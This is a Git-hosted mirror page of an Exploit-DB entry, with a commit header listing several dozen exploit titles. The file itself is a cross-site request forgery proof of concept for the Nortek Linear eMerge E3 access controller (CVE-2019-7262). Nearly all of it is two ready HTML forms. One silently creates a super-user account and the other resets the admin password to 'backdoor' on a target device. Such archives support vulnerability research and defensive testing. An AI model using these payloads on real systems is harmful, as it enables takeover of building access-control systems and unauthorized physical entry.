bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/hardware/webapps/47620.txt
Offensive Security c8181201fd DB: 2019-11-13 
38 changes to exploits/shellcodes

Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path
Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path
Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path
RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path
Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)
Wondershare Application Framework Service - _WsAppService_  Unquote Service Path
eMerge E3 Access Controller 4.6.07 - Remote Code Execution
eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)
CBAS-Web 19.0.0 - Information Disclosure
Prima FlexAir Access Control 2.3.38 - Remote Code Execution
Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting
Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting
Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting
eMerge E3 1.00-06 - Unauthenticated Directory Traversal
eMerge E3 1.00-06 - Privilege Escalation
eMerge E3 1.00-06 - Remote Code Execution
eMerge E3 1.00-06 - Cross-Site Request Forgery
Atlassian Confluence 6.15.1 - Directory Traversal
eMerge E3 1.00-06 - Arbitrary File Upload
eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting
eMerge50P 5000P 4.6.07 - Remote Code Execution
CBAS-Web 19.0.0 - Remote Code Execution
CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin)
CBAS-Web 19.0.0 - Username Enumeration
CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection
Joomla 3.9.13 - 'Host' Header Injection
Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting
Prima Access Control 2.3.35 - Arbitrary File Upload
Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)
Optergy 2.3.0a - Remote Code Execution
FlexAir Access Control 2.4.9api3 - Remote Code Execution
Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)
Optergy 2.3.0a - Username Disclosure
Optergy 2.3.0a - Remote Code Execution (Backdoor)
Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting
FlexAir Access Control 2.3.35 - Authentication Bypass
Bematech Printer MP-4200 - Denial of Service
2019-11-13 05:01:43 +00:00

53 lines
No EOL
2.2 KiB
Text
Raw Blame History

# Exploit Title: eMerge E3 1.00-06 - Cross-Site Request Forgery
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7262
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
# PoC
# Nortek Linear eMerge E3 Access Control Cross-Site Request Forgery
<!-- CSRF Add Super User -->
<html>
<body>
<form action="http://192.168.1.2/?c=webuser&m=insert" method="POST">
<input type="hidden" name="No" value="" />
<input type="hidden" name="ID" value="hax0r" />
<input type="hidden" name="Password" value="hax1n" />
<input type="hidden" name="Name" value="CSRF" />
<input type="hidden" name="UserRole" value="1" />
<input type="hidden" name="Language" value="en" />
<input type="hidden" name="DefaultPage" value="sitemap" />
<input type="hidden" name="DefaultFloorNo" value="1" />
<input type="hidden" name="DefaultFloorState" value="1" />
<input type="hidden" name="AutoDisconnectTime" value="24" />
<input type="submit" value="Add Super User" />
</form>
</body>
</html>
<!-- CSRF Change Admin Password -->
<html>
<body>
<form action="http://192.168.1.2/?c=webuser&m=update" method="POST">
<input type="hidden" name="No" value="1" />
<input type="hidden" name="ID" value="admin" />
<input type="hidden" name="Password" value="backdoor" />
<input type="hidden" name="Name" value="admin" />
<input type="hidden" name="UserRole" value="1" />
<input type="hidden" name="Language" value="en" />
<input type="hidden" name="DefaultPage" value="sitemap" />
<input type="hidden" name="DefaultFloorNo" value="1" />
<input type="hidden" name="DefaultFloorState" value="1" />
<input type="hidden" name="AutoDisconnectTime" value="24" />
<input type="submit" value="Change Admin Password" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink